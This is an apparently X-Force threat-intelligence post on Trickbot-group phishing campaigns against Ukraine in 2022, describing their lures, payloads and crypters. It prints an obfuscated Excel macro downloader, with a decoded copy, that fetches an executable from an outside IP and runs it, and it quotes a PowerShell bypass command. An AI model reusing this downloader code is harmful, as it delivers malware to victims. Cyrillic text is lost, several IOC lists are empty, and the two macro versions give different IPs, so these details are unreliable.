Following ongoing research our team, IBM Security X-Force has uncovered evidence indicating that the Russia-based cybercriminal syndicate “Trickbot group” has been systematically attacking Ukraine since the Russian invasion — an unprecedented shift as the group had not previously targeted Ukraine. Between mid-April and mid-June of 2022 the Trickbot group, tracked by X-Force as ITG23 and also known as Wizard Spider, DEV-0193, and the Conti group, has conducted at least six campaigns — two of which have been discovered by X-Force — against Ukraine, during which they deployed IcedID, CobaltStrike, AnchorMail, and Meterpreter. Prior to the Russian invasion, ITG23 had not been known to target Ukraine, and much of the group’s malware was even configured to not execute on systems if the Ukrainian language was detected.
ITG23’s campaigns against Ukraine are notable due to the extent to which this activity differs from historical precedent and the fact that these campaigns appeared specifically aimed at Ukraine with some payloads that suggest a higher degree of target selection.
ITG23 is a financially motivated cybercriminal gang known primarily for developing the Trickbot banking Trojan, which was first identified in 2016; since that time the group has used its payloads to gain a foothold in victim environments for ransomware attacks, including Ryuk, Conti, and Diavol. The systematic attacks observed against Ukraine include reported and suspected phishing attacks against Ukrainian state authorities, Ukrainian individuals and organizations, and the general population. Successful attacks that resulted in data theft or ransomware would provide ITG23 with additional extortion opportunities, and particularly damaging attacks could harm Ukraine’s economy.
The observed activities reported in this blog highlight a trend of this group choosing targets that align with Russian state interests against the backdrop of the ongoing conflict. In addition to an announcement by the Conti Ransomware group (which IBM tracks as part of ITG23) that they would act in support of Russian state interests at the beginning of the invasion of Ukraine, leaked chats between ITG23 members indicated that two senior individuals within the group had previously discussed in mid-April 2021 the targeting of entities that “work against the Russian Federation” and agreed that they were (Russian) “patriots.” Additionally, the Executive Director of Bellingcat claimed to have received a tip that a cybercriminal group was in communication with Russia’s Federal Security Service (FSB).
While investigating these campaigns, X-Force analysts also spotted new malware and tools being used by ITG23: a malicious Excel downloader used to deliver the payloads, a self-extracting archive (SFX) designed to drop and build ITG23 payloads such as AnchorMail, and a malware crypter X-Force has dubbed “Forest”. Of note, the Forest crypter has also been used with the Bumblebee malware, providing further evidence that ITG23 is behind Bumblebee. In this article, we provide details on the six campaigns we identified and describe the new malware and tools used during these attacks.
Trickbot Group Campaigns Target Ukraine
X-Force analysts have investigated at least six ITG23 campaigns specifically targeting Ukraine that took place between mid-April and mid-June. Four of these campaigns have been disclosed by CERT-UA, which tracks them under the group name UAC-0098, while this analysis introduces two newly uncovered campaigns by X-Force. Following our analysis of these campaigns, X-Force assesses:
ITG23 itself is controlling the delivery of the emails and malware — i.e., they are not executed by independent distribution affiliates. None of these campaigns are consistent with the techniques that known ITG23 third-party distribution affiliates are using to deliver the payloads to their targets. In 2021, X-Force analysts tracked several campaigns that were probably carried out directly by ITG23 personnel.
Three of the six campaigns use a malicious Excel downloader that has not been observed in other campaigns.
Two campaigns use ISO image files to distribute the payloads; these ISO files probably are created by a boutique ISO builder that has supplied previous campaigns delivering ITG23 payloads.
Five of the six campaigns directly download CobaltStrike, Meterpreter, or AnchorMail onto the target machine. Typically, these payloads are downloaded later during infections commencing with malware such as Trickbot, Emotet, or IcedID, suggesting these attacks are part of targeted campaigns during which ITG23 is willing to immediately deploy higher-value backdoors.
The CobaltStrike and IcedID payloads, which were used in four of the six campaigns, all use ITG23’s Tron, Hexa, or Forest crypters. The presence of an ITG23 crypter with a sample is a strong indication that its developer, distributor, or operator may either be part of ITG23 or has a partnership with the group. Crypters are applications designed to encrypt and obfuscate malware to evade analysis by antivirus scanners and malware analysts.
Campaign #1: ITG23 Delivers IcedID in Mid-April
In mid-April, ITG23 used phishing emails to deliver a malicious Excel file (described in detail below) to targets in Ukraine that downloaded and installed IcedID. ITG23 has a very close relationship with the IcedID group dating back several years and is likely relying on IcedID to obtain initial access into a victim’s environment after having discontinued the use of Trickbot and Bazarloader as of December 2021 and February 2022, respectively. According to CERT-UA, the campaign targeting consisted of “mass distribution among citizens” of Ukraine, suggesting less discriminate targeting within the country. Malicious spreadsheets used the filenames “?????? ????????????? ????????.xls” (“List of mobilized citizens.xls”), “?????????????? ??????.xls” (“Mobilization list.xls”), and “?????????????? ??????.xls” (“Mobilization register.xls”). The IcedID samples downloaded during this campaign used ITG23’s Tron and Hexa crypters, further linking this campaign with ITG23.
Campaign #1 IOCs:
ac1d19c5942946f9eee6bc748dee032b97eb3ec3e4bb64fead3e5ac101fb1bc8 (Tron crypter)
55df2954add86715fc3d728459d79a6d2b88d34d9f23fafe9c5a573bb773d9e9 (Hexa crypter)
Campaign #2: ITG23 Delivers CobaltStrike in Mid-April
Shortly after the above campaign in mid-April, ITG23 used a similar malicious Excel file to download a CobaltStrike sample which used the ITG23 “Tron” crypter. CERT-UA called this campaign a “cyberattack on state organizations of Ukraine” and disclosed that the attacker used emails with the subject “??????! ?????????? ????????? ?????????! ????????????? >” (“Urgent! Unblocking Azovstal Urgently! Unlocking “Azovstal”). A malicious Excel spreadsheet used in this campaign was uploaded to the VirusTotal repository from Ukraine with the filename “????????? ?? ?????????” (“The military in Azovstal”). The reported targeting of state organizations and direct download of CobaltStrike suggest this was a more targeted attack against specific victims.
Campaign #2 IOCs:
Campaign #3: ITG23 Delivers Meterpreter in Late-April
In late April, CERT-UA released details of a phishing campaign delivering Meterpreter which they assessed was associated with the Trickbot group. The campaign used emails with the subject “???s ???s???? ?????? No 576/22 ??? ???????ta???? ?????? ???????” (“Decree of the Press Office of the European Union No. 576/22 on uninterrupted security measures”) to deliver an ISO image file. CERT-UA stated that the attack was against “the state authorities of Ukraine.” Similar to campaign #2, the reported targeting of state organizations and direct download of Meterpreter suggest this campaign was directed at specific targets.
X-Force analysts have uncovered additional information tying this ISO image file and campaign to ITG23. CERT-UA describes an execution sequence in which the embedded Microsoft Shortcut (LNK) file executes a PowerShell script “z.ps1” using the command “-exec bypass -w h -file z.ps1” that drops a Ukrainian-themed decoy document and executes the Meterpreter executable (b.exe). A nearly identical execution sequence was used during an ITG23 campaign against Ukraine in late May (Campaign #5) described further below.
We suspect that these ISO images are being sourced from a builder using UltraISO or PyCdlib to create the disk images. ITG23 and its distribution affiliates such as Hive0107 (aka TA578) previously have sourced ISOs that are probably from this builder. In February and March, two campaigns, one of which belonged to Hive0107, used ISO images to deliver IcedID that are similar to the ISOs used in late April (Campaign #3) and late May (Campaign #5) against Ukraine. For example:
Both ISOs contain LNK files created on the same machine “desktop-ouvurbp” and with other identical metadata.
Both ISOs use the same PowerShell command identified in April: “-exec bypass -w h -file z.ps1”.
The PowerShell script used in March is similar to those used in Campaigns #3 and #5 using the “Start-Process” command to drop a decoy document and execute a PE file.
Campaign #3 IOCs:
Related ISO images used in February and March 2022 to deliver IcedID:
Campaign #4: ITG23 Delivers AnchorMail in Early May
In early May, X-Force discovered a campaign using a malicious Excel file very similar to those used in the first two campaigns that downloaded AnchorMail, a backdoor developed by ITG23 and based on their AnchorDNS malware. It is unusual to see Anchor backdoors downloaded directly as the first stage of an attack; typically, they are installed later in the infection. Their use suggests that this campaign may have been targeted against specific individuals or organizations, although we lack information on the specific target set.
The spreadsheet was uploaded to the VirusTotal repository on May 5 from Ukraine with the name Nuclear.xls – suggesting an alarming lure. The file was downloaded from a domain using the Ukrainian country code top-level domain: “lviv.uz[.]ua”. When executed, the spreadsheet downloads a WinRAR self-extracting archive (SFX) (see below for additional details) that delivers the AnchorMail backdoor. We have also identified other ITG23 payloads using this SFX as part of their installation sequence, including IcedID and CobaltStrike.
Campaign #4 IOCs
Staging URL (Excel)
Staging URL (AnchorMail SFX)
Campaign #5: ITG23 Delivers CobaltStrike in Late May
X-Force analysts have also identified an ITG23 campaign against Ukraine that likely took place in late May or early June. The campaign used an ISO image file created on May 31 that is very similar to the one described in Campaign #3 from late April. The ISO was uploaded to the VirusTotal repository on June 2, 2022, from Ukraine with the filename “????????????CN07.iso” (“Message CN07.iso”). The embedded Microsoft Shortcut file executes the PowerShell file z.ps1 which drops a PDF decoy customs declarations form and executes a CobaltStrike executable (b.exe).
This CobaltStrike sample uses a new ITG23 malware crypter X-Force has dubbed “Forest” (see below for additional details). Notably, this new Forest crypter is also being used with Bumblebee loader samples, adding further evidence that this new loader family is built and operated by ITG23.
Campaign #5 IOCs:
Campaign #6: ITG23 Delivers CobaltStrike in Mid-June
X-Force analysts in mid-June identified a suspicious CobaltStrike sample using ITG23’s Tron crypter, suggesting a relationship to ITG23 or one of its partners or affiliates. CERT-UA a few days later released a report indicating that this CobaltStrike sample was used in recent phishing attacks against “critical infrastructure facilities of Ukraine.” To deliver the payload, the attacker used emails purporting to be from the “???????? ????????? ?????? ???????” (“State Tax Service of Ukraine”) with the subject “???????????? ??? ??????ry n??????” (“Report non-payment of the tax”) to deliver a malicious document titled “?????????? ???????? ???????.docx” (“Imposition of penalties.docx”). The document was contained within a Zip archive titled “????????????????????????.zip” (“Imposition of Penalty Sanctions.zip”).
The email and document lure contain information about requirements to pay taxes in Ukraine. Of note, the text in the document lure is identical to that posted on this web page about Ukrainian tax requirements. When opened, the malicious document uses the vulnerability CVE-2022-30190 (“Follina”) to download an html file that will in turn download and execute the CobaltStrike Beacon. Of note, the SSL Public Key embedded in this Beacon is identical to the one in the Beacon used in Campaign #5, indicating that these two Beacons can be traced back to the same CobaltStrike Team Server installation.
Campaign #6 IOCs:
Staging URL (html)
Staging URL (CS)
Attacks Signal Cybercriminal Support for Russian Interests
ITG23 activity has previously avoided Ukrainian targets. Russian-speaking criminal underground communities have long generally discouraged if not outright banned going after former Soviet countries and–while not relevant to Ukraine–members of the Commonwealth of Independent States (CIS). This code of conduct likely came about to avoid creating victims in malware operators’ countries of residence, in large part to avoid antagonizing law enforcement. It also had the added benefit of encouraging Russian-speaking criminal cooperation based on a shared sense of us-versus-the-rest solidarity. According to an indictment released by the U.S. Department of Justice (DOJ) in 2021, ITG23 (the group behind Trickbot) operated from multiple former Soviet countries, including Belarus, Russia, and Ukraine.
However, ideological divisions and allegiances have increasingly become apparent within the Russian-speaking cybercriminal ecosystem this year, with ITG23 as a primary case study. Conti Ransomware group declared a pro-Russian stance early in the conflict, stating their commitment to attack entities that would oppose Moscow. The ContiLeaks, which exposed message logs and other files exchanged between members of ITG23, were reportedly obtained and leaked by a Ukrainian researcher.
Although we have yet to observe similar activity on a wider scale, these campaigns provide evidence that Ukraine is in the crosshairs of prominent Russian cybercriminal groups. Ukraine has been targeted with a wide variety of cyber activity leading up to and since the invasion, including distributed-denial-of-service (DDoS) attacks and defacements and attempted destructive activity attributed to Russian state-sponsored actors.
New ITG23 Malware, Tools Used in Attacks on Ukraine
X-Force analysts detected several new malware and tools employed during these campaigns:
A malicious Excel file used to download the payloads.
A self-extracting archive (SFX) designed to drop and build ITG23 payloads such as AnchorMail, CobaltStrike, and IcedID.
A new ITG23 malware crypter X-Force has dubbed “Forest.”
Malicious Excel Downloader
Three of the six campaigns targeting Ukraine used similar malicious Excel downloaders. The malicious downloader code is stored as a simple macro within the Excel file which is set to run upon opening the file, providing the user has macros enabled. If macros are disabled then the malicious code is unable to run.
The macro code downloads a file from a hardcoded URL, saves it to the file system, and then executes the downloaded file. Two variants of the code are present across the analyzed samples, one which downloads an executable file which it then runs without arguments, and a second which downloads a DLL file which it then runs using the Windows rundll32 command.
The samples all make use of basic obfuscation techniques within the macro code, with some function and variable names replaced with randomly generated names, and strings values encoded in a hexadecimal ascii format and split into multiple parts. An example of one of the obfuscated macros is as follows:
Application.ScreenUpdating = False
Dim xHttp: Set bnntwxnuvivrf = CreateObject(itslnwmojhejvmg(“4d6963726f736f”) & itslnwmojhejvmg(“66742e584d4c48545450”))
Dim bStrm: Set krzbmwewmr = CreateObject(itslnwmojhejvmg(“41646f64622e53747265”) & itslnwmojhejvmg(“616d”))
bnntwxnuvivrf.Open itslnwmojhejvmg(“474554”), itslnwmojhejvmg(“687474703a2f2f3139332e3134392e3137”) & itslnwmojhejvmg(“362e3137322f61746163686d656e742e657865”), False
Dim sweidpa As String
sweidpa = Environ(“AppData”)
.Type = 1
.savetofile sweidpa & itslnwmojhejvmg(“5c736572766963657a2e”) & itslnwmojhejvmg(“657865”), 2
Shell (sweidpa & itslnwmojhejvmg(“5c736572”) & itslnwmojhejvmg(“766963657a2e657865”))
Application.ScreenUpdating = True
Decoding the strings results in the following cleaned up code:
Application.ScreenUpdating = False
Dim xHttp: Set bnntwxnuvivrf = CreateObject(“Microsoft.XMLHTTP”)
Dim bStrm: Set krzbmwewmr = CreateObject(“Adodb.Stream”)
bnntwxnuvivrf.Open “GET”, “http://18.104.22.168/atachment.exe”, False
Dim sweidpa As String
sweidpa = Environ(“AppData”)
.Type = 1
.savetofile Environ(“AppData”) & “servicez.exe”, 2
Shell (Environ(“AppData”) & “servicez.exe”)
Application.ScreenUpdating = True
The download URL, file name, and save file path all differ across the samples, and are presented below. It is noted that the first sample appears to have a typo in the execution file name, which does not match the save file name, so this sample would not have executed correctly.
Source: Read More